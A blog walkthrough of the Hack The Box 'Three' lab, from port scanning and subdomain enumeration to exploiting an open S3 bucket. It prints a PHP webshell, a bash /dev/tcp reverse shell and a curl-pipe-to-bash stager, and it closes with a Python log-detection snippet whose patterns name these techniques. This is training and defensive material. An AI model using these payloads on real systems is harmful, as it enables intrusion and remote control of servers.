The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks


Three: Get a reverse shell via AWS S3

posted on 21.5.2023 by Below Surface in "Hack The Box"

First things first: a port scan. Please exchange ip with the machine's IP address.

sudo nmap -sV ip

Relevant output:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

By pasting the IP address into a browser, a website will load. However, if we try to open the website via the url "thetoppers.htb", which can be found on the CONTACT page (mail@thetoppers.htb), it will not work. So we modify our local hosts file:

sudo nano /etc/hosts

After the 127... entries, add your machine's IP address and the url "thetoppers.htb", so it looks like this:

127.0.0.1       localhost
127.0.1.1       kali
ip              thetoppers.htb
...

Then hit ctrl + o and then enter to save the changes and ctrl + x to close the editor.

Now, when we paste the url "thetoppers.htb" into the browser, it still won't work: we need to prefix it with "http://". The working url is

http://thetoppers.htb

Let's now search for available subdomains with Gobuster.

If you don't have the following wordlist installed yet, run

sudo apt install seclists

Then you can search for subdomains:

sudo gobuster vhost -u http://thetoppers.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

The "--append-domain" flag is crucial if you use Gobuster v3.2 or above! The relevant result is:

Found: s3.thetoppers.htb Status: 404 [Size: 21]

Let's also add this to the hosts file, like we did before. The hosts file looks something like this now:

127.0.0.1       localhost
127.0.1.1       kali
ip              thetoppers.htb
ip              s3.thetoppers.htb

We can confirm that everything works so far by pasting "http://s3.thetoppers.htb" into the browser. The result should be:

{"status": "running"}


Now it's time to install the AWS CLI and connect to the s3 bucket.

sudo apt install awscli

Then we need to configure aws:

aws configure

And type in any string. It does not matter what, because those keys are not actually checked. I used "temp".

Let's list any s3 bucket available:

aws --endpoint=http://s3.thetoppers.htb s3 ls

Expected output:

2023-05-21 02:40:47 thetoppers.htb

Let's list the content of the s3 bucket:

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

Expected output:

                           PRE images/
2023-05-21 02:40:47          0 .htaccess
2023-05-21 02:40:47      11952 index.php


Let's create a local shell.php file with the following content:

<?php system($_GET["cmd"]); ?>

Now we will upload this script to the s3 bucket.

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

Expected output:

upload: ./shell.php to s3://thetoppers.htb/shell.php

To confirm it's uploaded, run this command again:

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

The shell.php file should be listed there. We can also go to our browser and paste this url:

http://thetoppers.htb/shell.php?cmd=id

Expected output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)


Finally we can get the reverse shell. Let's look up the inet IP address of tun0:

ifconfig tun0

The relevant output is (ip being the IP address you need):

inet ip

Create a local shell.sh file and paste in the following content, exchanging ip with the inet value from ifconfig tun0:

#!/bin/bash
sh -i >& /dev/tcp/ip/443 0>&1

Then start listening on port 443 (more stealthy than port 1337) with ncat:

sudo nc -lvnp 443

Expected output:

listening on [any] 443 ...


In a new terminal window, start a web server to host our reverse shell script:

python3 -m http.server 8080

Expected output:

Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Now, paste this url into your browser (exchange ip with the IP address you got from "ifconfig tun0"):

http://thetoppers.htb/shell.php?cmd=curl%20ip:8080/shell.sh|bash

In the ncat terminal window, new output should appear, including something like this:

connect to [10.10.14.131] from (UNKNOWN) [10.129.133.141] 39378
sh: 0: can't access tty; job control turned off

Running

id

should now print

uid=33(www-data) gid=33(www-data) groups=33(www-data)

So, it works! Let's get the flag. Type in

cd ..

to navigate to the directory /var/www. Then run

cat flag.txt

to output the flag!
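From the defender's side, the two requests used above (shell.php?cmd=id and the curl ... | bash stager) leave an obvious trail in the Apache access log. The following Python snippet is an added example, not part of the original post: it parses constructed access-log lines in Apache combined format, flags requests that hand a command to a .php file through a query parameter, and rates a command that pipes a downloaded script into a shell as critical. The log lines, the parameter list and the severity labels are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined" format. Lines 3 and 4 mirror the
# webshell calls from the walkthrough; the others are benign site traffic.
SAMPLE_LOG = """\
10.10.14.131 - - [21/May/2023:02:45:01 +0000] "GET /index.php HTTP/1.1" 200 11952 "-" "Mozilla/5.0"
10.10.14.131 - - [21/May/2023:02:45:09 +0000] "GET /images/band.jpg HTTP/1.1" 200 90412 "-" "Mozilla/5.0"
10.10.14.131 - - [21/May/2023:02:46:30 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 53 "-" "Mozilla/5.0"
10.10.14.131 - - [21/May/2023:02:47:12 +0000] "GET /shell.php?cmd=curl%2010.10.14.131:8080/shell.sh|bash HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.131 - - [21/May/2023:02:47:40 +0000] "GET /index.php?page=contact HTTP/1.1" 200 11952 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status code of a combined-format line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Query parameter names that minimal PHP webshells typically read a command from (assumed list).
CMD_PARAMS = ("cmd", "c", "exec", "command")

# Patterns showing a fetched script being piped straight into a shell or a raw reverse shell.
PIPE_TO_SHELL = re.compile(r'(curl|wget)\b.*\|\s*(ba)?sh\b|/dev/tcp/|\bnc\b.*\s-e\b')


def analyze(line):
    """Return a finding dict for a webshell-style request, or None for a normal line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith(".php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values for us
    hit = next((p for p in CMD_PARAMS if p in params), None)
    if hit is None:
        return None
    command = params[hit][0]
    severity = "critical" if PIPE_TO_SHELL.search(command) else "high"
    return {"ip": m["ip"], "time": m["ts"], "path": url.path,
            "param": hit, "command": command, "severity": severity}


def scan(log_text):
    """Run analyze() over every line and keep only the findings."""
    return [f for f in (analyze(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f'{finding["severity"].upper():8} {finding["ip"]} {finding["path"]}?{finding["param"]}= {finding["command"]!r}')
```

The same rule fires on a POST body if you log it, and on the S3 side the upload itself shows up as an anonymous PUT of a .php object, which is the earlier point at which a bucket policy or object-ownership check should have refused the write.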

Tags:

hack the box
nmap
gobuster
ncat
php
aws cli
s3 bucket
reverse shell

Sources:

https://app.hackthebox.com/starting-point
https://www.youtube.com/watch?v=vPhaZM4gfHI
